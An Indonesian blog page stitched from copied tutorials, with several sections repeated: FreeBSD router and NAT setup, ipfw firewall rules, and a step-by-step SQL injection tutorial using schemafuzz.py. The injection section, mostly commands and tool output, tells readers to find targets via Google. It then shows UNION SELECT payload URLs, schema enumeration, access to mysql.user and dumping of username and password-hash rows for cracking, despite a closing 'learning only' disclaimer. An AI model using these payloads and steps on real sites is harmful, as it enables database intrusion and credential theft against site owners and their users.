Mempercepat delay booting freebsd:
# ee /boot/defaults/loader.conf
~
#autoboot_delay=”10? # hilangkan tanda pagarnya dan ganti angka 10 sesuai dengan
keinginan anda (misal: 1)
Me remote router dari komputer workstation.
Login dari konsole pakai ssh di linux dan unix:
# ssh 199.199.199.1
Login dari ms. windows pake putty.exe <— program telnet dan ssh untuk remote melalui windows ke unix dan linux.
Mengupdate FreeBSD ke KERNEL STABLE secara online menggunakan CVSup
# pkg_add -r cvsup-without-gui
# cp /usr/share/examples/cvsup/stable-supfile /etc
# ee /etc/stable-supfile
–> cvsup.id.freebsd.org # update kernel dari server indonesia.
# reboot
lanjutkan dgn perintah ini:
# cvsup -g -L 2 /etc/stable-supfile
# ee /etc/make.conf
KERNCONF=ROUTER
# cd /usr/src/
# make buildworld
# make buildkernel
# make installkernel
# reboot
===========================
ngedit tampilan awal router
===========================
ee /etc/motd
FreeBSD 5.3-RELEASE (MPL) #0: Mon Jan 14 23:44:30 UTC 2008
Welcome to my Router
+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
+++ +++
+++ ATTENTION! +++
+++ You’re now on strict area of +++
+++ Proxy Minas Pagai Network, +++
+++ all your activity are being logged. +++
+++ +++
+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
Regard’s -admin underiez dot com
Mudah2an bermanfaat
-=selesai=-
sumber:http://underiez.com/2008/10/23/router-freebsd-dengan-nat/
cinta pada pandangan pertama nih… aku mulai dari download tutorial dari embah google
nyuri sana sini.. akhirnya aku buat dhe coretan ini.. okehh….
sejauh ini udah aku buktikan udah bisa.. alhamdulillah.. langsung aja dhe.. kalo
mau makan, makan aja dulu, mau kebelakang cpt kebelakang……z z z zz
kalo udah siap.. lemas kan jari2 anda.. siapkan segala nya
mulai dari mental n spirit anda …
karena kita udah mulai semangat mengikuti projek ini..
ambil nafas dalam-dalam… keluarkan .. lakukan sesuai selera anda..
are you ready…. 1 …. 2
1. install dulu OS freebsd nya
2. install dengan packet yang minimum aja biar g lama..
3. setelah itu kita mulai compile kernel, tapi sebelunya periksa dulu
/usr/rc/sys/ kalo belum ada berarti belum ada.. perlu di install dulu thu packetnya
4. install kernel yuukk… mounting terlebih dahulu cdrom nya.. mount /cdrom/ kalo udah
ketik aja “sysinstall” pilih paket agar bisa download dari luar kita instal port
nya juga “port” dicentang lagi
5. sesudah itu kita mulai compile kernel pertama kita cp dulu file GENERIC yang ada di
directory /usr/src/sys/i386/conf/ sebagai contoh saya cp dengan nama ROUTER
6. kalo udah kita copy kita edit file ROUTER yang kita copy tadi “ee ROUTER”
7. ganti indent GENERIc dengan indent ROUTER tambah kan opiton berikut:
options IPFIREWALL
options IPFIREWALL_FORWARD
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options IPFIREWALL_DEFAULT_TO_ACCEPT
options IPDIVERT
options IPSTEALTH
options DUMMYNET
options HZ=1000
options IPFILTER
options IPFILTER_LOG
#speedy
options NETGRAPH
options NETGRAPH_ETHER
options NETGRAPH_PPPOE
options NETGRAPH_SOCKET
#management bw
options ALTQ # Alternate queueing
options ALTQ_CBQ # Class Based Queueing
options ALTQ_RED # Random Early Detection
options ALTQ_RIO # Triple RED for DiffServ (needs RED)
options ALTQ_HFSC # Hierarchical Fair Service Curve
options ALTQ_CDNR # DiffServ traffic conditioner
options ALTQ_PRIQ # Priority Queue
#packet filter
device pf
device pflog
device pfsync
#squid
options SYSVMSG
options MSGMNB=8192
options MSGMNI=40
options MSGSEG=512
options MSGSSZ=64
options MSGTQL=2048
options SYSVSHM
options SHMSEG=16
options SHMMNI=32
options SHMMAX=2097152
options SHMALL=4096
agar lebih enak kita hilangin aja option yang g berguna seperti SCI,RAID, dll
sesuaikan dengan kompi anda pokok e..
8. kalo udah ketikkan “#configur ROUTER” sesudah itu “#make cleandepend && make depend”
tunggu sambil ngopi g boleh ngerokok he he… kalo udah “#make && make install”
wah nunggu lagi nih kita makan aja dulu.. kan dah laper
bung kalo udah kita ngapain lagi
kita reboot kompi kita.. kalo udah login lalu kita ketik uname -i kalo udah muncul
“ROUTER” berbahagialah hasil compile anda ..::berhasil”…
9. Konfigurasi IP Address:
sebelum anda lakukan setting ini, tanyakan milik anda, mulai dari IP Public, subnet, gateway lengkap
dengan DNS nya kepada ISP anda. kemudian lanjutkan dgn perintah ini:
# ee /etc/rc.conf
hostname=”iwan.com” ==> ada g thu
ifconfig_rl0=”inet 199.199.199.7 netmask 255.255.255.0? ==> ke internet
ifconfig_rl1=”inet 192.168.0.1 netmask 255.255.255.0? ==> ke LAN
defaultrouter=”199.199.199.1?
kemudian simpan, lanjutkan ke setting DNS.
Setting DNS:
10. # ee /etc/resolve.conf
Domain jardiknas.org
nameserver 118.98.224.2 ==> dns1 anda
nameserver 118.98.224.3 ==> dns2 kamu
pastikan router kita bisa akses internet.. ping aja ke google.com “#ping google.com”
kalo dah replay wah lanjut dhe..
11.Setting Firewall, Natd, dan service-service lainnya:
# ee /etc/defaults/rc.conf
selanjutnya akan muncul spt dibawah ini:
defaultrouter =”YES”
gateway_enable = “YES”
sshd_enable =”YES” # agar bisa remote dgn putty
firewall_enable =”YES” # sebagai filter
firewall_type =”OPEN”
natd_enable =”YES”
natd_interface =”rl0? # lan card yg disambung ke IP Public / internet.
sendmail semuanya yang “YES” diganti “NO” untuk men-disable service sendmail.
simpan konfigurasi ini, kemudian reboot komputer:
12.# reboot
sejauh ini fungsi router standart sudah selesai, g percaya?? coba aja di client..
akan tetapi jika anda ingin menambah konfigurasi
lanjutkan saja tahab berikut:
Mengaktifkan ftp, ssh,telnet, dll:
# ee /etc/inetd.conf
ftp tcp nowait # hapus tanda pagar di depan teks ftp
ssh tcp nowait # hapus tanda pagar di depan teks ssh
telnet tcp nowait # hapus tanda pagar di depan teks telnet
Mengganti Port ssh:
# ee /etc/ssh/sshd_config
~
#VersionAddendum FreeBSD-20050903 ~
Port 22 # hilangkan tanda pagar didepan teks port dan angka 22 boleh anda ganti
ke 2222/7575 sesuai dengan selera anda.
Mempercepat delay booting freebsd:
# ee /boot/defaults/loader.conf
~
#autoboot_delay=”10? # hilangkan tanda pagarnya dan ganti angka 10 sesuai dengan
keinginan anda (misal: 1)
Me remote router dari komputer workstation.
Login dari konsole pakai ssh di linux dan unix:
# ssh 199.199.199.1
Login dari ms. windows pake putty.exe <— program telnet dan ssh untuk remote melalui windows ke unix dan linux.
Mengupdate FreeBSD ke KERNEL STABLE secara online menggunakan CVSup
# pkg_add -r cvsup-without-gui
# cp /usr/share/examples/cvsup/stable-supfile /etc
# ee /etc/stable-supfile
–> cvsup.id.freebsd.org # update kernel dari server indonesia.
# reboot
lanjutkan dgn perintah ini:
# cvsup -g -L 2 /etc/stable-supfile
# ee /etc/make.conf
KERNCONF=ROUTER
# cd /usr/src/
# make buildworld
# make buildkernel
# make installkernel
# reboot
===========================
ngedit tampilan awal router
===========================
ee /etc/motd
FreeBSD 5.3-RELEASE (MPL) #0: Mon Jan 14 23:44:30 UTC 2008
Welcome to my Router
+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
+++ +++
+++ ATTENTION! +++
+++ You’re now on strict area of +++
+++ Proxy Minas Pagai Network, +++
+++ all your activity are being logged. +++
+++ +++
+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
Regard’s -admin underiez dot com
Mudah2an bermanfaat
-=selesai=-
sumber:http://underiez.com/2008/10/23/router-freebsd-dengan-nat/
Konfigurasi Firewall di FreeBSD menggunakan ipfw
1. Konfigurasi Kernel
Ada beberapa opsi konfigurasi yang harus ditambahkan pada kernel agar ipfw dapat digunakan, Opsi yang akan di tambahkan pada file kernel antara lain :
options IPFIREWALL #firewall
options IPFIREWALL_VERBOSE #informasi firewallnya
options IPFILTER #dukungan untuk ipfilter
options IPFILTER_LOG #log ipfilter
#options IPFIREWALL_DEFAULT_TO_ACCEPT
Jika anda menginginkan default firewall menjadi terbuka, tambahkan saja opsi tersebut.
2. Kompilasi kernel
# cd /usr/src/sys/i386/conf; config CONFIG_KERNEL_
# cd ../../compile/CONFIG_KERNEL
# make depend; make
3. Instalasi Kernel
Jika proses diatas selesai tanpa ‘error’ maka perintah terakhir
#make install
#init 6
4. Menggunakan ipfw untuk membuat ACL (access control list)
Secara dasar aturan untuk ipfw sebagai berikut :
ipfw action number [allow|deny] [all|tcp|udp|ip] darimana kemana via apa
Ubah user menjadi root, contoh nya :
#su
Membolehkan localhost untuk berkomunikasi dengan dirinya sendiri :
/sbin/ipfw add 100 pass all from any to any via lo0
/sbin/ipfw add 200 deny all from any to 127.0.0.0/8
Membolehkan localhost untuk berkomunikasi ke siapa saja melalui ethernet
/sbin/ipfw add 300 allow all from IP_ANDA to any
Membolehkan koneksi normal yang sudah terhubung dengan baik
/sbin/ipfw add 350 allow tcp from any to any established
Jika anda menjalankan webserver dan mailserver, anda memerlukan port 80 dan 25 agar dapat
di akses oleh host yang lain.
/sbin/ipfw add 400 allow tcp from any to any 80
/sbin/ipfw add 500 allow tcp from any to any 25
Membolehkan data tipe udp untuk dikirimkan dari nameserver sebagai fungsi DNS :
/sbin/ipfw add 600 allow udp from DNS_SERVER 53 to IP_ANDA
Membolehkan seluruh ICMP kecuali ping :
/sbin/ipfw add 700 deny icmp from any to YOUR_IP_HERE icmptypes 8
/sbin/ipfw add 800 allow icmp from any to any
Jika anda ingin host berjalan dengan tipe firewall terbuka, tambahkan di file /etc/rc.conf
firewall_enable=”YES”
firewall_type=”OPEN”
Semoga Bermanfaat.
sumber: www.purwakarta.org
Ada beberapa opsi konfigurasi yang harus ditambahkan pada kernel agar ipfw dapat digunakan, Opsi yang akan di tambahkan pada file kernel antara lain :
options IPFIREWALL #firewall
options IPFIREWALL_VERBOSE #informasi firewallnya
options IPFILTER #dukungan untuk ipfilter
options IPFILTER_LOG #log ipfilter
#options IPFIREWALL_DEFAULT_TO_ACCEPT
Jika anda menginginkan default firewall menjadi terbuka, tambahkan saja opsi tersebut.
2. Kompilasi kernel
# cd /usr/src/sys/i386/conf; config CONFIG_KERNEL_
# cd ../../compile/CONFIG_KERNEL
# make depend; make
3. Instalasi Kernel
Jika proses diatas selesai tanpa ‘error’ maka perintah terakhir
#make install
#init 6
4. Menggunakan ipfw untuk membuat ACL (access control list)
Secara dasar aturan untuk ipfw sebagai berikut :
ipfw action number [allow|deny] [all|tcp|udp|ip] darimana kemana via apa
Ubah user menjadi root, contoh nya :
#su
Membolehkan localhost untuk berkomunikasi dengan dirinya sendiri :
/sbin/ipfw add 100 pass all from any to any via lo0
/sbin/ipfw add 200 deny all from any to 127.0.0.0/8
Membolehkan localhost untuk berkomunikasi ke siapa saja melalui ethernet
/sbin/ipfw add 300 allow all from IP_ANDA to any
Membolehkan koneksi normal yang sudah terhubung dengan baik
/sbin/ipfw add 350 allow tcp from any to any established
Jika anda menjalankan webserver dan mailserver, anda memerlukan port 80 dan 25 agar dapat
di akses oleh host yang lain.
/sbin/ipfw add 400 allow tcp from any to any 80
/sbin/ipfw add 500 allow tcp from any to any 25
Membolehkan data tipe udp untuk dikirimkan dari nameserver sebagai fungsi DNS :
/sbin/ipfw add 600 allow udp from DNS_SERVER 53 to IP_ANDA
Membolehkan seluruh ICMP kecuali ping :
/sbin/ipfw add 700 deny icmp from any to YOUR_IP_HERE icmptypes 8
/sbin/ipfw add 800 allow icmp from any to any
Jika anda ingin host berjalan dengan tipe firewall terbuka, tambahkan di file /etc/rc.conf
firewall_enable=”YES”
firewall_type=”OPEN”
Semoga Bermanfaat.
sumber: www.purwakarta.org
Senin, 19 Januari 2009
Tutorial SQL Injection dengan Menggunakan Schemafuzz
Author : Andr3^81
e-Mail : andr3-81 [at] linuxmail [dot] org
website : http://andr381.tk
Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de
tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.
ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut
pertama-tama kita cari target dengan google dan ditemukan:
misalnya
http://127.0.0.1/site/phpweb/forum.php?forum=1
sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help
kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol
langkah pertama
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
langkah kedua
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done
langkah ketiga
---------------
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info
maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done
ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe
untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0]webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done
langkah selanjutnya
--------------------
cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password
eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
NB:
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya
Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...
program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.
PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya
Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.
e-Mail : andr3-81 [at] linuxmail [dot] org
website : http://andr381.tk
Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de
tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.
ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut
pertama-tama kita cari target dengan google dan ditemukan:
misalnya
http://127.0.0.1/site/phpweb/forum.php?forum=1
sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help
kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol
langkah pertama
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
langkah kedua
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done
langkah ketiga
---------------
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info
maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done
ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe
untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0]webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done
langkah selanjutnya
--------------------
cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password
eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
NB:
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya
Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...
program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.
PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya
Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.
Langganan:
Postingan (Atom)